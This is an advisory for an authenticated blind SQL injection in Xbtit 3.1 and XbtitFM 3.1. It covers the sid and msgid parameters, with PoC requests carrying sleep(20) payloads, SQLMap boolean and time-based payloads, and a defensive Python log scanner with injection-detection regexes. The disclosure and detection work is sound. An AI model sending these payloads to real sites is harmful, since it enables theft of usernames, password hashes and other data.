SQL Injection
A blind SQL Injection vulnerability exists in Xbtit 3.1 and XbtitFM 3.1 via the sid parameter (GET) in the /ajaxchat/getHistoryChatData.php file, which is accessible to a simple registered user with default privileges. As a result, a malicious user can extract sensitive data such as usernames and passwords and, in some cases, use this vulnerability to gain remote code execution.
——————————————
[Vulnerability Type]
SQL Injection
——————————————
[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1
——————————————
[Affected Product Code Base]
Xbtit 3.1
https://github.com/btiteam/xbtit-3.1/ (Latest as of 22-12-2021)
https://github.com/btiteam/xbtit-3.1/blob/master/ajaxchat/getHistoryChatData.php
XbtitFM 3.1 (Private source code thus not available to analyze further)
https[://]xbtit.eu/xbtitfm/
XbtitFM uses xbtit's core with additional features. It is affected by the same issue, and additionally in the extra file /chatedit.php, whose GET id parameter (msgid) offers similar functionality and is vulnerable in the same way.
——————————————
[Attack Type]
Remote – Authenticated
——————————————
[Impact Information Disclosure]
True
——————————————
[PoC]
Log in as a simple user and post a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following PoC, which causes a 20-second sleep delay, to manually test whether the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be the id of a valid chat message you have already created!
http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit
Original request
Modified request to include SQLi payload
GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout
Cookie: ajax_poller_1=1; uid=6; pass=e6d36bba3f1b36152182ad0093441345; PHPSESSID=oe2bebgui5b6dhoavg59n3nnmf
Upgrade-Insecure-Requests: 1
SQLMap payloads
Boolean-based blind payload:
page=allshout&sid=2201 AND 5205=5205&edit
Time-based blind payload:
page=allshout&sid=2201 AND (SELECT 8933 FROM (SELECT(SLEEP(5)))gkzE)&edit
XbtitFM 3.1 (private source code) uses xbtit's core with additional features. It is affected by the same issue, and additionally in the extra file /chatedit.php, whose GET id parameter (msgid) offers almost the same functionality and is vulnerable in the same way.
The same technique therefore applies to /chatedit.php instead of /getHistoryChatData.php, with the msgid (GET) parameter in place of sid (GET).
GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: xbtit.local
Cookie: uid=4; pass=f530298bfc5cd53f7316fb2f1fe34a52; PHPSESSID=f3vdo18n1t834jg6d6ok3lch36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Use the following PoC, which causes a 20-second sleep delay, to manually test whether the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be the id of a valid chat message you have already created!
GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20
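As an added defender-side example (not code from this advisory or from the Xbtit/XbtitFM projects), the following Python script covers both PoC sections above: it checks the chat message id parameters the advisory names, sid on the index.php?page=allshout path that reaches /ajaxchat/getHistoryChatData.php and msgid on XbtitFM's /chatedit.php, against the strict decimal form a message id should have, and classifies anything else either as a malformed id or as a blind-injection probe matching the sleep()/tautology/subselect patterns quoted in the PoC and SQLMap payloads. The same numeric whitelist is what an application-side fix would enforce before the id ever reaches the query. The access-log layout (Apache common/combined), the log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that, per the advisory, should only ever carry a chat message id:
# sid (index.php?page=allshout -> /ajaxchat/getHistoryChatData.php) and msgid (XbtitFM /chatedit.php).
ID_PARAMS = ("sid", "msgid")

# Patterns typical of the blind-injection probes quoted in the advisory.
SQLI_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),                   # time-based probe: sleep(N)
    re.compile(r"\bbenchmark\s*\(", re.I),               # alternative MySQL delay primitive
    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),   # boolean tautology: AND 5205=5205
    re.compile(r"\b(and|or)\b\s*\(\s*select\b", re.I),   # subselect chained after AND/OR
    re.compile(r"--\s|--$|#|/\*"),                       # comment terminators
]

# Apache common/combined access-log layout (assumed format for the constructed sample below).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def id_param_is_clean(value):
    """A chat message id is a plain decimal integer; anything else should never reach the query."""
    return re.fullmatch(r"[0-9]+", value) is not None

def inspect_target(target):
    """Classify one request target (path + query).

    Returns (verdict, param, decoded_value); verdict is 'clean', 'malformed-id'
    or 'sqli-probe'. parse_qs already percent-decodes, so %20 becomes a space.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if id_param_is_clean(value):
                continue
            if any(p.search(value) for p in SQLI_PATTERNS):
                return ("sqli-probe", name, value)
            return ("malformed-id", name, value)
    return ("clean", None, None)

def scan_log(lines):
    """Run inspect_target over access-log lines; return (ip, target, verdict, param) per flagged request."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        verdict, param, _ = inspect_target(m.group("target"))
        if verdict != "clean":
            flagged.append((m.group("ip"), m.group("target"), verdict, param))
    return flagged

# Constructed sample log: the second and third requests carry the advisory's time-based PoC
# payloads for sid and msgid; the fifth carries a non-numeric but non-SQL value.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Dec/2021:10:00:01 +0000] "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537&edit HTTP/1.1" 200 4123
203.0.113.10 - - [22/Dec/2021:10:00:07 +0000] "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1" 200 4123
198.51.100.7 - - [22/Dec/2021:10:01:15 +0000] "GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1" 200 2210
198.51.100.7 - - [22/Dec/2021:10:01:40 +0000] "GET /chatedit.php?action=edit&msgid=16 HTTP/1.1" 200 2210
192.0.2.33 - - [22/Dec/2021:10:02:00 +0000] "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=abc&edit HTTP/1.1" 200 4123
"""

if __name__ == "__main__":
    for ip, target, verdict, param in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{verdict:12s} {param:6s} {ip:14s} {target}")
```

Run stand-alone, the script prints the three flagged requests from the constructed log. The malformed-id verdict is kept separate from sqli-probe on purpose: a non-numeric id that matches no injection pattern is still something the endpoint should have rejected, and seeing it in logs is a cheap signal that the numeric whitelist is missing on that code path.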
[Reference]
https://github.com/btiteam/xbtit-3.1/